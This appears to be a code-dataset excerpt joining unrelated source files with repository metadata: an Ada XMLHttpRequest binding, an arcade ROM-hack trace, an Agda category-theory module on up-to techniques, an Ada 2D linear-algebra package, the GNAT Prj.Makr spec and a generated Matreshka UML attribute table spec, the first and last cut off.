JavaScript_Property_Getter, Link_Name => "readyState"; -- The XMLHttpRequest object can be in several states. The readyState -- attribute must return the current state, which must be one of the -- following values: UNSENT : constant State := 0; -- The object has been constructed. OPENED : constant State := 1; -- The open() method has been successfully invoked. During this state -- request headers can be set using setRequestHeader() and the request -- can be made using the send() method. HEADERS_RECEIVED : constant State := 2; -- All redirects (if any) have been followed and all HTTP headers of the -- final response have been received. Several response members of the -- object are now available. LOADING : constant State := 3; -- The response entity body is being received. DONE : constant State := 4; -- The data transfer has been completed or something went wrong during the -- transfer (e.g. infinite redirects). not overriding procedure Open (Self : not null access constant XML_Http_Request; Method : League.Strings.Universal_String; URL : League.Strings.Universal_String; Async : Boolean := True; Username : League.Strings.Universal_String := League.Strings.Empty_Universal_String; Password : League.Strings.Universal_String := League.Strings.Empty_Universal_String) with Import => True, Convention => JavaScript_Method, Link_Name => "open"; -- Sets the request method, request URL, and synchronous flag. not overriding procedure Set_Request_Header (Self : not null access XML_Http_Request; Header : League.Strings.Universal_String; Value : League.Strings.Universal_String) with Import => True, Convention => JavaScript_Method, Link_Name => "setRequestHeader"; -- Appends an header to the list of author request headers, or if header is -- already in the list of author request headers, combines its value with -- value. not overriding function Get_Timeout (Self : not null access constant XML_Http_Request) return Natural with Import => True, Convention => JavaScript_Property_Getter, Link_Name => "timeout"; not overriding procedure Set_Timeout (Self : not null access XML_Http_Request; Value : Natural) with Import => True, Convention => JavaScript_Property_Setter, Link_Name => "timeout"; -- Can be set to a time in milliseconds. When set to a non-zero value will -- cause fetching to terminate after the given time has passed. When the -- time has passed, the request has not yet completed, and the synchronous -- flag is unset, a timeout event will then be dispatched, or a -- "TimeoutError" exception will be thrown otherwise (for the send() -- method). not overriding function Get_With_Credentials (Self : not null access constant XML_Http_Request) return Boolean with Import => True, Convention => JavaScript_Property_Getter, Link_Name => "withCredentials"; -- True when user credentials are to be included in a cross-origin request. -- False when they are to be excluded in a cross-origin request and when -- cookies are to be ignored in its response. Initially false. not overriding procedure Set_With_Credentials (Self : not null access XML_Http_Request; Value : Boolean) with Import => True, Convention => JavaScript_Property_Setter, Link_Name => "withCredentials"; not overriding function Get_Upload (Self : not null access constant XML_Http_Request) return access WebAPI.XHR.Event_Targets.Event_Target'Class with Import => True, Convention => JavaScript_Property_Getter, Link_Name => "upload"; -- Returns the associated XMLHttpRequestUpload object. It can be used to -- gather transmission information when data is transferred to a server. not overriding procedure Send (Self : not null access XML_Http_Request; Data : League.Strings.Universal_String) with Import => True, Convention => JavaScript_Method, Link_Name => "send"; -- Initiates the request. The optional argument provides the request entity -- body. The argument is ignored if request method is GET or HEAD. not overriding procedure Send (Self : not null access XML_Http_Request; Data : access WebAPI.XHR.Form_Datas.Form_Data'Class := null) with Import => True, Convention => JavaScript_Method, Link_Name => "send"; not overriding procedure Abort_Request (Self : not null access XML_Http_Request) with Import => True, Convention => JavaScript_Method, Link_Name => "abort"; -- Cancels any network activity. -- Response not overriding function Get_Status (Self : not null access constant XML_Http_Request) return Natural with Import => True, Convention => JavaScript_Property_Getter, Link_Name => "status"; -- Returns the HTTP status code. not overriding function Get_Status_Text (Self : not null access constant XML_Http_Request) return League.Strings.Universal_String with Import => True, Convention => JavaScript_Property_Getter, Link_Name => "statusText"; -- Returns the HTTP status text. not overriding function Get_Response_Header (Self : not null access constant XML_Http_Request; Header : League.Strings.Universal_String) return League.Strings.Universal_String with Import => True, Convention => JavaScript_Method, Link_Name => "getResponseHeader"; -- Returns the header field value from the response of which the field name -- matches header, unless the field name is Set-Cookie or Set-Cookie2. not overriding function Get_All_Response_Headers (Self : not null access constant XML_Http_Request; Header : League.Strings.Universal_String) return League.Strings.Universal_String with Import => True, Convention => JavaScript_Method, Link_Name => "getAllResponseHeaders"; -- Returns all headers from the response, with the exception of those whose -- field name is Set-Cookie or Set-Cookie2. not overriding procedure Override_Mime_Type (Self : not null access constant XML_Http_Request; MIME : WebAPI.DOM_String) with Import => True, Convention => JavaScript_Method, Link_Name => "overrideMimeType"; -- Sets the Content-Type header for the response to mime. not overriding function Get_Response_Type (Self : not null access constant XML_Http_Request) return League.Strings.Universal_String with Import => True, Convention => JavaScript_Property_Getter, Link_Name => "responseType"; -- Returns the response type. not overriding procedure Set_Response_Type (Self : not null access XML_Http_Request; Value : League.Strings.Universal_String) with Import => True, Convention => JavaScript_Property_Setter, Link_Name => "responseType"; -- Can be set to change the response type. Values are: the empty string -- (default), "arraybuffer", "blob", "document", "json", and "text". not overriding function Get_Response_Text (Self : not null access constant XML_Http_Request) return WebAPI.DOM_String with Import => True, Convention => JavaScript_Property_Getter, Link_Name => "responseText"; -- Returns the text response entity body. not overriding function Get_Response_XML (Self : not null access constant XML_Http_Request) return WebAPI.DOM.Documents.Document_Access with Import => True, Convention => JavaScript_Property_Getter, Link_Name => "responseXML"; -- Returns the document response entity body. private type XML_Http_Request is limited new WebAPI.XHR.Event_Targets.Event_Target with null record with Export => True, Convention => JavaScript, Link_Name => "XMLHttpRequest"; overriding function Dispatch_Event (Self : not null access XML_Http_Request; Event : not null access WebAPI.DOM.Events.Event'Class) return Boolean with Import => True, Convention => JavaScript_Method, Link_Name => "dispatchEvent"; end WebAPI.XHR.Requests;
wof/lcs/base/1D6.asm
zengfr/arcade_game_romhacking_sourcecode_top_secret_data
6
22338
copyright zengfr site:http://github.com/zengfr/romhack 012A5C move.w #$30, ($1d6,A5) [base+1C7] 012A62 move.l #$90bc38, ($1d8,A5) [base+1D6] 01A610 dbra D1, $1a60e copyright zengfr site:http://github.com/zengfr/romhack
UpTo-Properties/UpTo.agda
hbasold/Sandbox
0
4302
<filename>UpTo-Properties/UpTo.agda module UpTo where open import Level open import Relation.Binary using (Rel; IsEquivalence) open import Data.Product open import Categories.Support.Equivalence open import Categories.Category open import Categories.2-Category open import Categories.Functor open import Categories.NaturalTransformation renaming (id to natId; _≡_ to _≡N_; setoid to natSetoid) hiding (_∘ˡ_; _∘ʳ_) open import Categories.Support.EqReasoning open import NaturalTransFacts Cat₀ = Category zero zero zero EndoFunctor : Cat₀ → Set zero EndoFunctor C = Functor C C record Endo⇒ (C₁ : Cat₀) (F₁ : EndoFunctor C₁) (C₂ : Cat₀) (F₂ : EndoFunctor C₂) : Set zero where field T : Functor C₁ C₂ ρ : NaturalTransformation (T ∘ F₁) (F₂ ∘ T) record UpTo⇒ {C₁ : Cat₀} {F : EndoFunctor C₁} {C₂ : Cat₀} {G : EndoFunctor C₂} (S₁ S₂ : Endo⇒ C₁ F C₂ G) : Set zero where module S₁ = Endo⇒ S₁ module S₂ = Endo⇒ S₂ field γ : NaturalTransformation S₁.T S₂.T -- The following diagram must commute -- T₁F - ρ₁ -> GT₁ -- | | -- γF Gγ -- | | -- v v -- T₂G - ρ₂ -> GT₂ .square : S₂.ρ ∘₁ (γ ∘ʳ F) ≡N (G ∘ˡ γ) ∘₁ S₁.ρ record _≡U_ {C₁ : Cat₀} {C₂ : Cat₀} {F : EndoFunctor C₁} {G : EndoFunctor C₂} {T₁ T₂ : Endo⇒ C₁ F C₂ G} (A : UpTo⇒ T₁ T₂) (B : UpTo⇒ T₁ T₂) : Set where field ≡U-proof : UpTo⇒.γ A ≡N UpTo⇒.γ B open _≡U_ infix 4 _≡U_ .≡U-equiv : {C₁ : Cat₀} {C₂ : Cat₀} {F : EndoFunctor C₁} {G : EndoFunctor C₂} → {A B : Endo⇒ C₁ F C₂ G} → IsEquivalence {A = UpTo⇒ A B} (_≡U_ {C₁} {C₂} {F} {G}) ≡U-equiv = record { refl = λ {A} → record { ≡U-proof = Setoid.refl natSetoid {UpTo⇒.γ A} } ; sym = λ {A} {B} p → record { ≡U-proof = Setoid.sym natSetoid {UpTo⇒.γ A} {UpTo⇒.γ B} (≡U-proof p) } ; trans = λ {A} {B} {C} p₁ p₂ → record { ≡U-proof = Setoid.trans natSetoid {UpTo⇒.γ A} {UpTo⇒.γ B} {UpTo⇒.γ C} (≡U-proof p₁) (≡U-proof p₂) } } id-UpTo⇒ : {C₁ : Cat₀} {F : EndoFunctor C₁} {C₂ : Cat₀} {G : EndoFunctor C₂} {A : Endo⇒ C₁ F C₂ G} → UpTo⇒ A A id-UpTo⇒ {C₁} {F} {C₂} {G} {A} = record { γ = natId ; square = begin Endo⇒.ρ A ∘₁ (natId {F = Endo⇒.T A} ∘ʳ F) ↓⟨ ∘₁-resp-≡ {f = Endo⇒.ρ A} {h = Endo⇒.ρ A} {g = natId {F = Endo⇒.T A} ∘ʳ F} {i = natId {F = Endo⇒.T A ∘ F}} (Setoid.refl natSetoid {Endo⇒.ρ A}) (identityNatʳ {F = Endo⇒.T A} F) ⟩ Endo⇒.ρ A ∘₁ (natId {F = Endo⇒.T A ∘ F}) ↓⟨ identity₁ʳ {X = Endo⇒.ρ A} ⟩ Endo⇒.ρ A ↑⟨ identity₁ˡ {X = Endo⇒.ρ A} ⟩ natId {F = G ∘ Endo⇒.T A} ∘₁ Endo⇒.ρ A ↑⟨ ∘₁-resp-≡ {f = G ∘ˡ natId {F = Endo⇒.T A}} {h = natId {F = G ∘ Endo⇒.T A}} {g = Endo⇒.ρ A} {i = Endo⇒.ρ A} (identityNatˡ {F = Endo⇒.T A} G) (Setoid.refl natSetoid {Endo⇒.ρ A}) ⟩ (G ∘ˡ natId {F = Endo⇒.T A}) ∘₁ Endo⇒.ρ A ∎ } where open SetoidReasoning (natSetoid {F = Endo⇒.T A ∘ F} {G ∘ Endo⇒.T A}) _•_ : {C₁ : Cat₀} {F : EndoFunctor C₁} {C₂ : Cat₀} {G : EndoFunctor C₂} {A B C : Endo⇒ C₁ F C₂ G} → UpTo⇒ B C → UpTo⇒ A B → UpTo⇒ A C _•_ {F = F} {G = G} {A = A} {B} {C} g f = record { γ = γ ∘₁ φ ; square = -- AF - A.ρ -> GA -- | | -- φF Gφ -- | | -- v v -- BF - B.ρ -> GB -- | | -- γF Gγ -- | | -- v v -- CF - C.ρ -> GC begin C.ρ ∘₁ ((γ ∘₁ φ) ∘ʳ F) ↓⟨ ∘₁-resp-≡ʳ {f = C.ρ} {(γ ∘₁ φ) ∘ʳ F} {(γ ∘ʳ F) ∘₁ (φ ∘ʳ F)} (∘ʳ-distr-∘₁ γ φ F) ⟩ C.ρ ∘₁ ((γ ∘ʳ F) ∘₁ (φ ∘ʳ F)) ↑⟨ assoc₁ {X = (φ ∘ʳ F)} {(γ ∘ʳ F)} {C.ρ} ⟩ (C.ρ ∘₁ (γ ∘ʳ F)) ∘₁ (φ ∘ʳ F) ↓⟨ ∘₁-resp-≡ˡ {f = C.ρ ∘₁ (γ ∘ʳ F)} {G ∘ˡ γ ∘₁ B.ρ} {φ ∘ʳ F} (UpTo⇒.square g) ⟩ (G ∘ˡ γ ∘₁ B.ρ) ∘₁ (φ ∘ʳ F) ↓⟨ assoc₁ {X = (φ ∘ʳ F)} {B.ρ} {G ∘ˡ γ} ⟩ (G ∘ˡ γ) ∘₁ (B.ρ ∘₁ (φ ∘ʳ F)) ↓⟨ ∘₁-resp-≡ʳ {f = G ∘ˡ γ} {B.ρ ∘₁ (φ ∘ʳ F)} {(G ∘ˡ φ) ∘₁ A.ρ} (UpTo⇒.square f) ⟩ (G ∘ˡ γ) ∘₁ ((G ∘ˡ φ) ∘₁ A.ρ) ↑⟨ assoc₁ {X = A.ρ} {G ∘ˡ φ} {G ∘ˡ γ} ⟩ ((G ∘ˡ γ) ∘₁ (G ∘ˡ φ)) ∘₁ A.ρ ↑⟨ ∘₁-resp-≡ˡ {f = G ∘ˡ (γ ∘₁ φ)} {(G ∘ˡ γ) ∘₁ (G ∘ˡ φ)} {A.ρ} (∘ˡ-distr-∘₁ G γ φ) ⟩ (G ∘ˡ (γ ∘₁ φ)) ∘₁ A.ρ ∎ } where module A = Endo⇒ A module B = Endo⇒ B module C = Endo⇒ C open SetoidReasoning (natSetoid {F = A.T ∘ F} {G ∘ C.T}) φ : A.T ⇒ B.T φ = UpTo⇒.γ f γ : B.T ⇒ C.T γ = UpTo⇒.γ g -- | Category of morphisms between endofunctors, where the morphisms -- are certain natural transformations (see UpTo⇒). -- This category will be the the setting in which we can talk about -- properties of up-to techniques. EndoMor : Σ Cat₀ (λ C → Functor C C) → Σ Cat₀ (λ C → Functor C C) → Cat₀ EndoMor (C₁ , F) (C₂ , G) = record { Obj = Endo⇒ C₁ F C₂ G ; _⇒_ = UpTo⇒ ; _≡_ = _≡U_ ; id = id-UpTo⇒ ; _∘_ = _•_ ; assoc = λ {_} {_} {_} {_} {f} {g} {h} → record { ≡U-proof = assoc₁ {X = UpTo⇒.γ f} {UpTo⇒.γ g} {UpTo⇒.γ h} } ; identityˡ = λ {_} {_} {f} → record { ≡U-proof = identity₁ˡ {X = UpTo⇒.γ f} } ; identityʳ = λ {_} {_} {f} → record { ≡U-proof = identity₁ʳ {X = UpTo⇒.γ f} } ; equiv = ≡U-equiv ; ∘-resp-≡ = λ {_} {_} {_} {f} {h} {g} {i} f≡h g≡i → record { ≡U-proof = ∘₁-resp-≡ {f = UpTo⇒.γ f} {UpTo⇒.γ h} {UpTo⇒.γ g} {UpTo⇒.γ i} (≡U-proof f≡h) (≡U-proof g≡i) } } -- | The 2-category of endofunctors, their morphisms and UpTo⇒ as 2-cells. -- This is the 2-category of endofunctors defined by Lenisa, Power and Watanabe. {- Endo : 2-Category (suc zero) zero zero zero Endo = record { Obj = Σ Cat₀ (λ C → Functor C C) ; _⇒_ = EndoMor ; id = record { F₀ = λ _ → record { T = id ; ρ = natId } ; F₁ = λ _ → id-UpTo⇒ ; identity = IsEquivalence.refl ≡U-equiv ; homomorphism = λ {_} {_} {_} {_} {F} → {!!} ; F-resp-≡ = {!!} } ; —∘— = {!!} ; assoc = {!!} ; identityˡ = {!!} ; identityʳ = {!!} } -}
1-base/math/source/generic/pure/algebra/any_math-any_algebra-any_linear-any_d2.adb
charlie5/lace-alire
1
8187
package body any_Math.any_Algebra.any_linear.any_d2 is ----------- -- Vector_2 -- function Angle_between_pre_Norm (U, V : in Vector_2) return Radians is use Functions, Vectors; Val : Real := U * V; -- Dot product. begin if val < -1.0 then val := -1.0; -- Clamp to avoid rounding errors. arcCos will elsif val > 1.0 then val := 1.0; -- fail with values outside this range. end if; return arcCos (Val); end Angle_between_pre_Norm; function Midpoint (From, To : in Vector_2) return Vector_2 is begin return ((From (1) + To (1)) * 0.5, (From (2) + To (2)) * 0.5); end Midpoint; function Distance (From, To : in Vector_2) return Real is begin return abs (From - To); end Distance; function Interpolated (From, To : in Vector_2; Percent : in unit_Percentage) return Vector_2 is P : constant Real := to_Real (Percent); S : constant Real := 1.0 - P; begin return (S * From (1) + P * To (1), S * From (2) + P * To (2)); end Interpolated; ------------- -- Matrix_2x2 -- function to_Matrix (Row_1, Row_2 : in Vector_2) return Matrix_2x2 is begin return ((Row_1 (1), Row_1 (2)), (Row_2 (1), Row_2 (2))); end to_Matrix; function to_rotation_Matrix (Angle : in Radians ) return Matrix_2x2 is use Functions; begin return (( cos (Angle), sin (Angle)), (-sin (Angle), cos (Angle))); end to_rotation_Matrix; function up_Direction (Self : in Matrix_2x2) return Vector_2 is begin return Normalised (Row (Self, 2)); end up_Direction; function right_Direction (Self : in Matrix_2x2) return Vector_2 is begin return Normalised (Row (Self, 1)); end right_Direction; function to_rotation_Transform (Rotation : in Matrix_2x2) return Matrix_3x3 is begin return ((Rotation (1, 1), Rotation (1, 2), 0.0), (Rotation (2, 1), Rotation (2, 2), 0.0), ( 0.0, 0.0, 1.0)); end to_rotation_Transform; ------------- -- Transform -- function to_Transform_2d (From : in Matrix_3x3) return Transform_2d is begin return (Rotation => get_Rotation (From), Translation => get_Translation (From)); end to_Transform_2d; function to_Transform (From : in Transform_2d) return Matrix_3x3 is begin return to_rotation_Transform (From.Rotation) * to_translation_Transform (From.Translation); end to_Transform; function to_translation_Transform (Translation : Vector_2) return Matrix_3x3 is begin return (( 1.0, 0.0, 0.0), ( 0.0, 1.0, 0.0), (Translation (1), Translation (2), 1.0)); end to_translation_Transform; function to_rotation_Transform (Angle : in Radians) return Matrix_3x3 is use Functions; begin return (( cos (Angle), sin (Angle), 0.0), (-sin (Angle), cos (Angle), 0.0), ( 0.0, 0.0, 1.0)); end to_rotation_Transform; function to_scale_Transform (Scale : in Vector_2) return Matrix_3x3 is begin return ((Scale (1), 0.0, 0.0), ( 0.0, Scale (2), 0.0), ( 0.0, 0.0, 1.0)); end to_scale_Transform; function to_Transform (Rotation : in Matrix_2x2; Translation : in Vector_2) return Matrix_3x3 is begin return ((Rotation (1, 1), Rotation (1, 2), 0.0), (Rotation (2, 1), Rotation (2, 2), 0.0), (Translation (1), Translation (2), 1.0)); end to_Transform; function to_Transform_2d (Rotation : in Radians; Translation : in Vector_2) return Transform_2d is begin return (to_rotation_Matrix (Rotation), Translation); end to_Transform_2d; function "*" (Left : in Vector_2; Right : in Transform_2d) return Vector_2 is Pad : constant Vector_3 := (Left (1), Left (2), 1.0); Result : constant Vector_3 := Pad * to_Transform (Right); begin return Vector_2 (Result (1 .. 2)); end "*"; function "*" (Left : in Vector_2; Right : in Matrix_3x3) return Vector_2 is use Vectors; Result : constant Vector := Vector (Left & 1.0) * Matrix (Right); begin return Vector_2 (Result (1 .. 2)); end "*"; function Invert (Transform : in Transform_2d) return Transform_2d is inverse_Rotation : constant Matrix_2x2 := Transpose (Transform.Rotation); begin return (Translation => inverse_Rotation * (-Transform.Translation), Rotation => inverse_Rotation); end Invert; function inverse_Transform (Transform : in Transform_2d; Vector : in Vector_2) return Vector_2 is V : constant Vector_2 := Vector - Transform.Translation; begin return Transpose (Transform.Rotation) * V; end inverse_Transform; function get_Rotation (Transform : in Matrix_3x3) return Matrix_2x2 is begin return ((Transform (1, 1), Transform (1, 2)), (Transform (2, 1), Transform (2, 2))); end get_Rotation; procedure set_Rotation (Transform : in out Matrix_3x3; To : in Matrix_2x2) is begin Transform (1, 1) := To (1, 1); Transform (1, 2) := To (1, 2); Transform (1, 3) := 0.0; Transform (2, 1) := To (2, 1); Transform (2, 2) := To (2, 2); Transform (2, 3) := 0.0; end set_Rotation; function get_Translation (Transform : in Matrix_3x3) return Vector_2 is begin return (Transform (3, 1), Transform (3, 2)); end get_Translation; procedure set_Translation (Transform : in out Matrix_3x3; To : in Vector_2) is begin Transform (3, 1) := To (1); Transform (3, 2) := To (2); Transform (3, 3) := 1.0; end set_Translation; end any_Math.any_Algebra.any_linear.any_d2;
llvm-gcc-4.2-2.9/gcc/ada/prj-makr.ads
vidkidz/crossbridge
1
27405
------------------------------------------------------------------------------ -- -- -- GNAT COMPILER COMPONENTS -- -- -- -- P R J . <NAME> -- -- -- -- S p e c -- -- -- -- Copyright (C) 2001-2005, Free Software Foundation, Inc. -- -- -- -- GNAT is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 2, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -- -- for more details. You should have received a copy of the GNU General -- -- Public License distributed with GNAT; see file COPYING. If not, write -- -- to the Free Software Foundation, 51 Franklin Street, Fifth Floor, -- -- Boston, MA 02110-1301, USA. -- -- -- -- GNAT was originally developed by the GNAT team at New York University. -- -- Extensive contributions were provided by Ada Core Technologies Inc. -- -- -- ------------------------------------------------------------------------------ -- Support for procedure Gnatname -- For arbitrary naming schemes, create or update a project file, -- or create a configuration pragmas file. package Prj.Makr is procedure Make (File_Path : String; Project_File : Boolean; Directories : Argument_List; Name_Patterns : Argument_List; Excluded_Patterns : Argument_List; Foreign_Patterns : Argument_List; Preproc_Switches : Argument_List; Very_Verbose : Boolean); -- Create a project file or a configuration pragmas file -- -- Project_File is the path name of the project file. If the project -- file already exists parse it and keep all the elements that are not -- automatically generated. -- -- Directory_List_File is the path name of a text file that -- contains on each non empty line the path names of the source -- directories for the project file. The source directories -- are relative to the directory of the project file. -- -- File_Name_Patterns is a GNAT.Regexp string pattern such as -- ".*\.ads|.*\.adb" or any other pattern. -- -- A project file (without any sources) is automatically generated -- with the name <project>_naming. It contains a package Naming with -- all the specs and bodies for the project. -- A file containing the source file names is automatically -- generated and used as the Source_File_List for the project file. -- It includes all sources that follow the Foreign_Patterns (except those -- that follow Excluded_Patterns). -- Preproc_switches is a list of optional preprocessor switches -gnatep= -- and -gnateD that are used when invoking the compiler to find the -- unit name and kind. end Prj.Makr;
source/amf/uml/amf-internals-tables-uml_attributes.ads
svn2github/matreshka
24
23443
------------------------------------------------------------------------------ -- -- -- Matreshka Project -- -- -- -- Ada Modeling Framework -- -- -- -- Runtime Library Component -- -- -- ------------------------------------------------------------------------------ -- -- -- Copyright © 2011-2012, <NAME> <<EMAIL>> -- -- All rights reserved. -- -- -- -- Redistribution and use in source and binary forms, with or without -- -- modification, are permitted provided that the following conditions -- -- are met: -- -- -- -- * Redistributions of source code must retain the above copyright -- -- notice, this list of conditions and the following disclaimer. -- -- -- -- * Redistributions in binary form must reproduce the above copyright -- -- notice, this list of conditions and the following disclaimer in the -- -- documentation and/or other materials provided with the distribution. -- -- -- -- * Neither the name of the Vadim Godunko, IE nor the names of its -- -- contributors may be used to endorse or promote products derived from -- -- this software without specific prior written permission. -- -- -- -- THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -- -- "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -- -- LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -- -- A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -- -- HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -- -- SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED -- -- TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR -- -- PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF -- -- LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING -- -- NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -- -- SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -- -- -- ------------------------------------------------------------------------------ -- $Revision$ $Date$ ------------------------------------------------------------------------------ -- This file is generated, don't edit it. ------------------------------------------------------------------------------ with AMF.DC; with AMF.UML; with AMF.UMLDI; with Matreshka.Internals.Strings; package AMF.Internals.Tables.UML_Attributes is function Internal_Get_URI (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_URI (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- Model => Package::URI -- Package => Package::URI -- Profile => Package::URI function Internal_Get_Abstraction (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Abstraction (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ComponentRealization => ComponentRealization::abstraction function Internal_Get_Action (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Action (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionExecutionSpecification => ActionExecutionSpecification::action function Internal_Get_Action (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Interaction => Interaction::action function Internal_Get_Activity (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Activity (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- AcceptCallAction => ActivityNode::activity -- AcceptEventAction => ActivityNode::activity -- ActionInputPin => ActivityNode::activity -- ActivityFinalNode => ActivityNode::activity -- ActivityParameterNode => ActivityNode::activity -- AddStructuralFeatureValueAction => ActivityNode::activity -- AddVariableValueAction => ActivityNode::activity -- BroadcastSignalAction => ActivityNode::activity -- CallBehaviorAction => ActivityNode::activity -- CallOperationAction => ActivityNode::activity -- CentralBufferNode => ActivityNode::activity -- ClearAssociationAction => ActivityNode::activity -- ClearStructuralFeatureAction => ActivityNode::activity -- ClearVariableAction => ActivityNode::activity -- ConditionalNode => ActivityNode::activity -- ControlFlow => ActivityEdge::activity -- CreateLinkAction => ActivityNode::activity -- CreateLinkObjectAction => ActivityNode::activity -- CreateObjectAction => ActivityNode::activity -- DataStoreNode => ActivityNode::activity -- DecisionNode => ActivityNode::activity -- DestroyLinkAction => ActivityNode::activity -- DestroyObjectAction => ActivityNode::activity -- ExpansionNode => ActivityNode::activity -- ExpansionRegion => ActivityNode::activity -- FlowFinalNode => ActivityNode::activity -- ForkNode => ActivityNode::activity -- InitialNode => ActivityNode::activity -- InputPin => ActivityNode::activity -- JoinNode => ActivityNode::activity -- LoopNode => ActivityNode::activity -- MergeNode => ActivityNode::activity -- ObjectFlow => ActivityEdge::activity -- OpaqueAction => ActivityNode::activity -- OutputPin => ActivityNode::activity -- RaiseExceptionAction => ActivityNode::activity -- ReadExtentAction => ActivityNode::activity -- ReadIsClassifiedObjectAction => ActivityNode::activity -- ReadLinkAction => ActivityNode::activity -- ReadLinkObjectEndAction => ActivityNode::activity -- ReadLinkObjectEndQualifierAction => ActivityNode::activity -- ReadSelfAction => ActivityNode::activity -- ReadStructuralFeatureAction => ActivityNode::activity -- ReadVariableAction => ActivityNode::activity -- ReclassifyObjectAction => ActivityNode::activity -- ReduceAction => ActivityNode::activity -- RemoveStructuralFeatureValueAction => ActivityNode::activity -- RemoveVariableValueAction => ActivityNode::activity -- ReplyAction => ActivityNode::activity -- SendObjectAction => ActivityNode::activity -- SendSignalAction => ActivityNode::activity -- SequenceNode => ActivityNode::activity -- StartClassifierBehaviorAction => ActivityNode::activity -- StartObjectBehaviorAction => ActivityNode::activity -- StructuredActivityNode => ActivityNode::activity -- TestIdentityAction => ActivityNode::activity -- UnmarshallAction => ActivityNode::activity -- ValuePin => ActivityNode::activity -- ValueSpecificationAction => ActivityNode::activity function Internal_Get_Activity_Scope (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Activity_Scope (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Variable => Variable::activityScope function Internal_Get_Actual (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Actual (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- TemplateParameterSubstitution => TemplateParameterSubstitution::actual function Internal_Get_Actual_Gate (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- InteractionUse => InteractionUse::actualGate -- PartDecomposition => InteractionUse::actualGate function Internal_Get_Addition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Addition (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Include => Include::addition function Internal_Get_After (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_After (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- GeneralOrdering => GeneralOrdering::after function Internal_Get_Aggregation (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Aggregation_Kind; procedure Internal_Set_Aggregation (Self : AMF.Internals.AMF_Element; To : AMF.UML.UML_Aggregation_Kind); -- ExtensionEnd => Property::aggregation -- Port => Property::aggregation -- Property => Property::aggregation function Internal_Get_Alias (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Alias (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- ElementImport => ElementImport::alias function Internal_Get_Allow_Substitutable (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Allow_Substitutable (Self : AMF.Internals.AMF_Element; To : Boolean); -- ClassifierTemplateParameter => ClassifierTemplateParameter::allowSubstitutable function Internal_Get_Annotated_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Comment => Comment::annotatedElement function Internal_Get_Applied_Profile (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Applied_Profile (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ProfileApplication => ProfileApplication::appliedProfile function Internal_Get_Applying_Package (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Applying_Package (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ProfileApplication => ProfileApplication::applyingPackage function Internal_Get_Argument (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- BroadcastSignalAction => InvocationAction::argument -- CallBehaviorAction => InvocationAction::argument -- CallOperationAction => InvocationAction::argument -- InteractionUse => InteractionUse::argument -- Message => Message::argument -- PartDecomposition => InteractionUse::argument -- SendObjectAction => InvocationAction::argument -- SendSignalAction => InvocationAction::argument -- StartObjectBehaviorAction => InvocationAction::argument function Internal_Get_Association (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Association (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ClearAssociationAction => ClearAssociationAction::association -- ExtensionEnd => Property::association -- Port => Property::association -- Property => Property::association function Internal_Get_Association_End (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Association_End (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExtensionEnd => Property::associationEnd -- Port => 